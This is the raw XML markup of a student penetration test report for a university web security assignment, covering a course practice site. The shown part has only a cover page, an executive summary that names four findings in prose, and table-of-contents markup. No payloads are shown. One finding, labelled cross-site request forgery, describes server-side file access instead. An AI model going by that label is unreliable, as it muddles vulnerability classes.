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71C60" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>We Test Pens Incorporated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E287706" w14:textId="5F13BABC" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:t xml:space="preserve">COMP90074 - Web Security Assignment </w:t>
      </w:r>
      <w:r w:rsidR="00CC4150">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B0D75" w14:textId="2E590A6A" w:rsidR="00B97362" w:rsidRPr="0010227E" w:rsidRDefault="0010227E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>iaxuan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFE0AE" w14:textId="197782B9" w:rsidR="00B97362" w:rsidRDefault="0010227E">
      <w:r>
        <w:t>965867</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B15E7" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="3DD42814" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="0F125ABD" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="4E2FC579" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="19B7915F" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="325097E5" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>PENETRATION TEST REPORT FOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DFF060" w14:textId="048CB74B" w:rsidR="00B97362" w:rsidRDefault="00717E64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00717E64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>PleaseHold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00717E64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pty. Ltd.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006750D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">- WEB APPLICATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221577F5" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA7A6C1" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B50F28" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B135197" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2DE274" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E553263" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557AED49" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EDE3F5" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4F1110" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704E4B3B" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A90E06" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8BABC3" w14:textId="2012849A" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Report delivered: </w:t>
      </w:r>
      <w:r w:rsidR="0010227E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0010227E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175D26E" w14:textId="77777777" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F49186D" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc71488319"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="477ADFD6" w14:textId="77777777" w:rsidR="00FC2B1D" w:rsidRDefault="00FC2B1D"/>
    <w:p w14:paraId="16A86D1C" w14:textId="264BDD70" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35">
      <w:r>
        <w:t xml:space="preserve">This report is for vulnerabilities found in website </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="008C435F">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://assignment-hermes.unimelb.life</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228855DB" w14:textId="77777777" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35"/>
    <w:p w14:paraId="7B26D62F" w14:textId="26F170AD" w:rsidR="00BE2D35" w:rsidRDefault="008A3B27">
      <w:r>
        <w:t>We Test Pens Incorporated has</w:t>
      </w:r>
      <w:r w:rsidR="00BE2D35">
        <w:t xml:space="preserve"> carried out an exhaustive penetration test of this web application at the request of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE2D35">
        <w:t>InHR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE2D35">
        <w:t xml:space="preserve">, and as a result, four vulnerabilities (and their associated risks) have been uncovered. Their severity from high to low </w:t>
      </w:r>
      <w:r w:rsidR="00E907C8">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00BE2D35">
        <w:t>as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DE0BF" w14:textId="77777777" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35"/>
    <w:p w14:paraId="7581F875" w14:textId="43DC5FD0" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35" w:rsidP="00BE2D35">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>SQL injection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778C919" w14:textId="14D6CFE8" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35" w:rsidP="00BE2D35">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ross-site </w:t>
      </w:r>
      <w:r w:rsidR="0088572A">
        <w:t>request forgery</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6084D2" w14:textId="37A8FEF6" w:rsidR="00BE2D35" w:rsidRDefault="00BE2D35" w:rsidP="00BE2D35">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ross-site </w:t>
      </w:r>
      <w:r w:rsidR="0088572A">
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E3994" w14:textId="2EE2D9A7" w:rsidR="00802EEA" w:rsidRDefault="00BE2D35" w:rsidP="00053557">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL wildcard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B561D" w14:textId="77777777" w:rsidR="00E907C8" w:rsidRDefault="00E907C8" w:rsidP="00BE2D35"/>
    <w:p w14:paraId="70627C6A" w14:textId="3A841CF1" w:rsidR="00BE2D35" w:rsidRDefault="00E907C8" w:rsidP="00BE2D35">
      <w:r>
        <w:t>SQL injection: In Find</w:t>
      </w:r>
      <w:r w:rsidR="00CD5B85">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>User page, an authenticated user can enquiry whether a user existed in the database, and there is a SQL injection vulnerability. If attackers input tricky strings and send the request to server, they can guess the content of this table according to the response. With brute force, they can figure out all data saved in this table containing all users’ information, such as username, id, and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB5DBB" w14:textId="08DF0700" w:rsidR="00E907C8" w:rsidRDefault="00E907C8" w:rsidP="00BE2D35"/>
    <w:p w14:paraId="2ADD5140" w14:textId="77777777" w:rsidR="0088572A" w:rsidRDefault="0088572A" w:rsidP="0088572A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ross-site request forgery: In User Profile page, there is a website input box and a validate website button, and an attacker can use this to explore the file structure of the server and access server’s local file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C4704" w14:textId="77777777" w:rsidR="0088572A" w:rsidRDefault="0088572A" w:rsidP="00BE2D35"/>
    <w:p w14:paraId="025C2420" w14:textId="2A28DF42" w:rsidR="00E907C8" w:rsidRDefault="00E907C8" w:rsidP="00BE2D35">
      <w:r>
        <w:t>Cross-site scripting:</w:t>
      </w:r>
      <w:r w:rsidR="00802EEA">
        <w:t xml:space="preserve"> In Anonymous Question page, an authenticated user can send their own script, and execute the script by the server. With additional information disclosure, users can perform unauthorized operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF69E0C" w14:textId="391A1052" w:rsidR="00CD5B85" w:rsidRDefault="00CD5B85"/>
    <w:p w14:paraId="37F0EB16" w14:textId="5CF584A8" w:rsidR="00CD5B85" w:rsidRDefault="00CD5B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL wildcard: In API Documentation page, there are instructions for enquiring API information in the database. However, an attacker can use SQL wildcard to access the API table and gain</w:t>
      </w:r>
      <w:r w:rsidR="00053557">
        <w:t xml:space="preserve"> all data saved there</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74626F89" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DC64A" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CF7E6" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1871600919"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="44A750A3" w14:textId="7DD30BA8" w:rsidR="00FC2B1D" w:rsidRDefault="006750D3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc71488319" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488319 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61CD5DA5" w14:textId="4854AEDC" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488320" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary of Findings</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488320 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E8E7A61" w14:textId="6B655760" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488321" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed Findings</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488321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5AF9A33E" w14:textId="1147999A"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22" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 1 – SQL Injection in Find User Functionality</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488322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35F870B8" w14:textId="5CA6F7D3"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23" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488323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17090B9A" w14:textId="634A91C3"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24" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488324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510ED4BB" w14:textId="6C326B2C"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25" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488325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4103F635" w14:textId="56667716"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26" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488326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500914C9" w14:textId="1D57A037"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27" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488327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076F5271" w14:textId="289D64FB"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28" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488328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54BA7059" w14:textId="27A34E56"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29" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488329 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
